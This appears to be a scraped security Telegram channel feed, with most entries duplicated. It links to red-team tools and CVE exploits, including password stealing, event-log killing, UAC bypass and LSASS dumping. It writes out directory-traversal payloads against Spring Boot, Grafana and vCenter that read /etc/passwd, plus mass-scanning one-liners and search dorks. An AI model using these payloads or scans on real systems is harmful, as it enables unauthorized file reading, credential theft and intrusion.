WindowsMDMLPE — CVE-2021-24084
# https://github.com/ohnonoyesyes/CVE-2021-24084
# https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html
#mdm #lpe #cve
# https://github.com/ohnonoyesyes/CVE-2021-24084
# https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html
#mdm #lpe #cve
Winlogon Password Leaking
The flow is:
— user enters password
— winlogon loads mpnotify.exe
— mpnotify opens RPC channel
— winlogon sends pass via RPC
— mpnotify forwards to DLL
— DLL stores it on disk
https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
#winlogon #password #leak #redteam
The flow is:
— user enters password
— winlogon loads mpnotify.exe
— mpnotify opens RPC channel
— winlogon sends pass via RPC
— mpnotify forwards to DLL
— DLL stores it on disk
https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
#winlogon #password #leak #redteam
DetectionLabELK
DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.
https://github.com/cyberdefenders/DetectionLabELK
#blueteam #detection #elk #lab
DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.
https://github.com/cyberdefenders/DetectionLabELK
#blueteam #detection #elk #lab
COM Objects P.1: The Hidden Backdoor in Your System
A deeper dive into COM objects: how to utilize them in redteam engagements, and how to detect and protect organizations from them if you are on the blueteam side.
https://medium.com/maltrak/com-objects-p-1-the-hidden-backdoor-in-your-system-947ac4285e85
#com #backdoor #redteam #blueteam
A deeper dive into COM objects: how to utilize them in redteam engagements, and how to detect and protect organizations from them if you are on the blueteam side.
https://medium.com/maltrak/com-objects-p-1-the-hidden-backdoor-in-your-system-947ac4285e85
#com #backdoor #redteam #blueteam
Medium
COM Objects P.1: The Hidden Backdoor in Your System
In the last few years, attackers have abused COM Objects to craft their Fileless attacks, evade defenses, bypass whitelisting, and even…
How Windows Stops Kerberos Usernames Being Case Sensitive
https://vbscrub.com/2021/11/29/how-windows-stops-kerberos-usernames-being-case-sensitive/
#kerberos #pre_auth #aes_salt
https://vbscrub.com/2021/11/29/how-windows-stops-kerberos-usernames-being-case-sensitive/
#kerberos #pre_auth #aes_salt
ManageEngine ADSelfService Plus — Authentication Bypass (CVE-2021-40539)
Details:
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Exploit:
https://github.com/synacktiv/CVE-2021-40539
#adselfservice #cve #auth #bypass
Details:
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Exploit:
https://github.com/synacktiv/CVE-2021-40539
#adselfservice #cve #auth #bypass
Synacktiv
How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus
CHAPS — Configuration Hardening Assessment PowerShell Script
CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment.
https://github.com/cutaway-security/chaps
#powershell #hardening #assessment #blueteam
CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment.
https://github.com/cutaway-security/chaps
#powershell #hardening #assessment #blueteam
GitHub
GitHub - cutaway-security/chaps: Configuration Hardening Assessment PowerShell Script (CHAPS)
Configuration Hardening Assessment PowerShell Script (CHAPS) - cutaway-security/chaps
Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/
#spring #actuator #cve #bugbounty
https://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../Details:
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/
#spring #actuator #cve #bugbounty
VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS
Zoomeye Dorks:
#vmware #vcenter #bugbounty
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Shodan Dorks:http.title:"ID_VC_Welcome"
Zoomeye Dorks:
app:"VMware vCenter"
https://github.com/l0ggg/VMware_vCenter#vmware #vcenter #bugbounty
Webapp Wordlists
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.
https://github.com/p0dalirius/webapp-wordlists
#wordlist #cms #bugbounty
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.
https://github.com/p0dalirius/webapp-wordlists
#wordlist #cms #bugbounty
GitHub
GitHub - p0dalirius/webapp-wordlists: This repository contains wordlists for each versions of common web applications and content…
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version....
OffensiveNim — PowerShell
Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well!
https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim
#offensive #nim #powershell
Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well!
https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim
#offensive #nim #powershell
GitHub
OffensiveNim/src/execute_powershell_bin.nim at master · Alh4zr3d/OffensiveNim
My experiments in weaponizing Nim (https://nim-lang.org/) - Alh4zr3d/OffensiveNim
Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver (CVE-2021-42008)
CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access.
https://syst3mfailure.io/sixpack-slab-out-of-bounds
#linux #6pack #lpe #cve
CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access.
https://syst3mfailure.io/sixpack-slab-out-of-bounds
#linux #6pack #lpe #cve
[CVE-2021-42008] Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver
CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf…
KeyHacks
Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
https://github.com/streaak/keyhacks
#api #key #check #bugbounty
Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
https://github.com/streaak/keyhacks
#api #key #check #bugbounty
GitHub
GitHub - streaak/keyhacks: Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can…
Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. - streaak/keyhacks
This media is not supported in your browser
VIEW IN TELEGRAM
jq + grep + fzf + curl = SharpCollection
https://github.com/Flangvik/SharpCollection
https://github.com/Flangvik/SharpCollection
alias SharpCollection='print -z `curl -sSL "https://api.github.com/repos/Flangvik/SharpCollection/git/trees/master?recursive=1" | jq -r ".tree[].path" | grep \\.exe | while read line; do echo "curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/$line >"; done | fzf --tac`'#csharp #collection #tooling
UAC bypass - DLL hijacking
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.
https://github.com/SecuProject/DLLHijackingScanner
#uac #bypass #dll #hijacking
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.
https://github.com/SecuProject/DLLHijackingScanner
#uac #bypass #dll #hijacking
Phant0m — Windows Event Log Killer
Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs.
https://github.com/hlldz/Phant0m
#windows #events #log #killer
Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs.
https://github.com/hlldz/Phant0m
#windows #events #log #killer
Rodan Telecom Exploitation Framework
Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.
https://github.com/Etisalat-Egypt/Rodan
#telecom #ss7 #gtp #sip
Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.
https://github.com/Etisalat-Egypt/Rodan
#telecom #ss7 #gtp #sip
GitHub
GitHub - Etisalat-Egypt/Rodan: Rodan Exploitation Framework
Rodan Exploitation Framework. Contribute to Etisalat-Egypt/Rodan development by creating an account on GitHub.
PowerRunAsAttached
This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).
Example:
https://github.com/DarkCoderSc/PowerRunAsAttached
#runas #powershell #pentest #tools
This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).
Example:
Invoke-RunAsAttached -Username "darkcodersc" -Password "testmepliz"https://github.com/DarkCoderSc/PowerRunAsAttached
#runas #powershell #pentest #tools
Grafana — Unauthorized Arbitrary Read File
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
Fofa.so:
ZoomEye:
PoC
The "plugin-id" could be any plugin that exists in the system
One line command to detect:
#grafana #lfi #bugbounty #pentest
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
title:"Grafana"Fofa.so:
app="Grafana"ZoomEye:
grafanaPoC
https://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.iniThe "plugin-id" could be any plugin that exists in the system
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'#grafana #lfi #bugbounty #pentest
Abusing Leaked Handles to Dump LSASS Memory
# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
# https://github.com/antonioCoco/MalSeclogon
#seclogon #lsass #dump #redteam
# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
# https://github.com/antonioCoco/MalSeclogon
#seclogon #lsass #dump #redteam